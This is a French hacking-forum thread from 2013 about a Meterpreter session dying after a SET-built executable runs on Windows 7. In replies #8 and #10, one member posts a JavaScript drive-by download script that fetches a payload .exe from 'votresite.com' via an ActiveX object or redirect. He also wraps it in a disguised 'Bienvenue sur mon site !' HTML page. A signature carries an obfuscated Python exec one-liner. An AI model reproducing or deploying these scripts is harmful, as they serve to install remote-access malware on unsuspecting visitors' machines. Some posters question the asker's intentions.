Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 15-02-2013 23:53:57

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Meterpreter session died

Bonsoir à tous, j'étais en train d'essayé metasploit sur backtrack 5R3. J'ai donc crée mon .exe avec SET. Je l'ai executé sur mon pc qui est sous windows 7, on voit qu'une session meterpreter s'ouvre mais ensuite il y a écrit :
"Meterpreter sessin 1 closed. Reason: Died"

Es-ce une erreur de ma part ou windows qui bloque l'attaque?

Merci d'avance smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 16-02-2013 21:39:38

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Meterpreter session died

C'est ton meterpreter qui s'est fait destroy (:


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 17-02-2013 19:04:04

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Meterpreter session died

Ah daccord, et il y a une raison particulière?

Hors Ligne

#4 17-02-2013 19:17:38

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Meterpreter session died

Je pense qu'il faudrait dire exactement ce que tu veux faire plutot que de tourner autour du pot...


Je dis ca parce que je t'ai deja repondu au sujet du SSL et je vois que tu continue vers la voie obscure de la force...


Donc soit plus clair, car tes intentions me semblent douteuses...


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#5 17-02-2013 21:35:30

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Meterpreter session died

J'ai 2 pc chez moi, et j'aimerai utiliser meterpreter pour l'utiliser à distance, et puis les trojans sont toujours détectés par l'antivirus, ce n'est que par usage personnel.

Hors Ligne

#6 17-02-2013 22:59:01

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Meterpreter session died

Anthonyy59 a écrit :

J'ai 2 pc chez moi, et j'aimerai utiliser meterpreter pour l'utiliser à distance, et puis les trojans sont toujours détectés par l'antivirus, ce n'est que par usage personnel.

Pourquoi ne pas utiliser teamwiever dans ce cas ?


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#7 18-02-2013 00:41:14

JeanCharles
Membre Indétronable
Lieu : Sainte-Anne
Inscription : 13-07-2012
Messages : 198

Re : Meterpreter session died

467013Dtcsarko.jpg


« γνωθι σεαυτον »

Hors Ligne

#8 22-02-2013 16:19:55

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Meterpreter session died

Quand tu exécutes un payload à travers un navigateur, ce payload s’exécute dans l'espace mémoire alloué à ce navigateur par le système d'exploitation, et avec les privilège de ce dernier, ce n'est pas aussi simple que d'aller faire un double clique sur un fichier EXE. C'est pour ça que les navigateurs puisqu'ils sont les premiers à subir une attaque, ne s’exécutent jamais en tant qu'administrateur et le systeme d'exploitation est programmé à ne jamais le leurs donner ce droit, sinon ce serait une faille de sécurité gravissime.

Je ne saurais te répondre avec certitude mais comme la dernière fois cela dépend du type de navigateur cible et de plusieurs facteurs excepter le fait que tu as très bien configuré ton payload, il peut s'agir de pare-feu, d'allocation de mémoire, de la fonction Sendbox exécutant les applets dans les navigateurs, ...etc. Par exemple, Chrome ouvre plusieurs processus quant tu ouvres plusieurs pages, en revanche Firefox ouvre plusieurs threads au sein même de son processus quant tu ouvres plusieurs pages.

Tu peux essayer ce script en JavaScript du tuto de Master-one, tu colles ton payload et tu adaptes le chemin de celui-ci et voir ce que ça donne:

* <script language="javascript">
* var exepath='http://votresite.com/payload.exe';
* var bname=navigator.appName;
* var bver=parseInt(navigator.appVersion);
* function install() {
* if ( navigator.platform && navigator.platform != 'Win32' ) {
* location.replace('about:blank');
* return;
* }
* if (bname == 'Microsoft Internet Explorer' && bver >= 2) {
* document.write('<object id="ayb" width=1 height=1 classid="CLSID:018B7EC3-EECA-11d3-8E71-0000E82C6C0D" codebase="'+exepath+'"></object>');
* } else if (bname == 'Netscape' && bver >= 4) {
* trigger = netscape.softupdate.Trigger;
* if (trigger.UpdateEnabled) {
* trigger.StartSoftwareUpdate(jarpath, trigger.DEFAULT_MODE)
* } else {
* location.replace(exepath);
* }
* } else {
* location.replace(exepath);
* }
* }
* install();
* </script>

Dernière modification par Fuji (26-02-2013 02:08:06)

Hors Ligne

#9 22-02-2013 19:07:47

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Meterpreter session died

Simplement par soif d'apprendre Furyo

Merci Fuji, j'essaierai et je te tiens au courant !

Hors Ligne

#10 22-02-2013 20:13:34

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Meterpreter session died

Il s'agit principalement d'une simple page HTML statique que tu peux crée, avec l’entête habituel et quelques balises pour écrire du texte et éventuellement une image JPG comme background pour faire jolie, et tu intègres le script. L'image et le payload EXE doivent être en local dans le même dossier que le navigateur sur le bureau par exemple:   

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" >

<head>

<title>Bienvenue sur mon site !</title>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

</head>

<body background="image.jpg">


<script language="javascript">
var exepath='meterpreter.exe';
var bname=navigator.appName;
var bver=parseInt(navigator.appVersion);
function install() {
if ( navigator.platform && navigator.platform != 'Win32' ) {
location.replace('about:blank');
return;
}
if (bname == 'Microsoft Internet Explorer' && bver >= 2) {
document.write('<object id="ayb" width=1 height=1 classid="CLSID:018B7EC3-EECA-11d3-8E71-0000E82C6C0D" codebase="'+exepath+'"></object>');
} else if (bname == 'Netscape' && bver >= 4) {
trigger = netscape.softupdate.Trigger;
if (trigger.UpdateEnabled) {
trigger.StartSoftwareUpdate(jarpath, trigger.DEFAULT_MODE)
} else {
location.replace(exepath);
}
} else {
location.replace(exepath);
}
}
install();
</script>


</html>

Fuji a écrit :

Quand tu exécutes un payload à travers un navigateur, ce payload s’exécute dans l'espace mémoire alloué à ce navigateur par le système d'exploitation

Je parle des exploits profitant des vulnérabilités dans les plugins des navigateurs (Java Runtime, Flash, Silverlight, QuickTime, RealPlayer, Windows Media Player, VLC, etc) qui sont généralement à base de buffer overflow, dont métasploit comporte un grand nombre mais pour la plupart sont périmés, dans le cas d'un exécutable exe il faudrait voir s'il apparaît dans la liste des processus, je ne suis pas sûre, si c'est pas le cas alors il est allé faire son nid dans le processus du browser, tu peux le découvrir grâce à la commande ("tasklist /svc") permettant de voir la liste des processus et ("/svc") pour voir avec quoi chaque processus est constitué. Je ne connais pas SET et je ne sais pas comment il procède, il faudra que je le teste en détail un de ces jours, je sais juste qu'il peut faire du bon phishing je crois smile

tasklist           --> pour dérouler la liste des processus

tasklist /svc    --> pour voir l'interieur de chaque processus

Tasklist /m      --> pour voir toutes les DLL et API utilisées par les processus

si la feunetre de l'invite de commande déborde, tu envois le tout dans un fichier texte:

tasklist /m > analyse.txt

Dernière modification par Fuji (24-02-2013 05:36:21)

Hors Ligne

#11 22-02-2013 22:36:39

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Meterpreter session died

Ca m'a l'air vraiment compliqué, ce texte je dois le taper ou exactement? Je sais que ce sont des caractères qui permettent de crée une page, mais où dois-je le taper exactement?

Hors Ligne

#12 22-02-2013 22:42:38

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Meterpreter session died

Essaie de te renseigner sur le fonctionnement de base d'un serveur web, et sur ce qu'est le langage html pour commencer, ce ne sont pas les ressources qui manquent sur le web. Ca ne sert à rien de te lancer dans quelque chose pour faire des copier coller sans comprendre de quoi il s'agit.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Épinglée :
103 60805 04-01-2015 21:11:56 par M1ck3y
2 1207 16-12-2014 02:52:33 par smed79
12 1863 06-08-2014 06:43:53 par Anthonyy59
2 1731 28-04-2014 14:58:55 par Teeknofil
8 1740 16-03-2014 00:38:47 par kcdtv

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.034 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]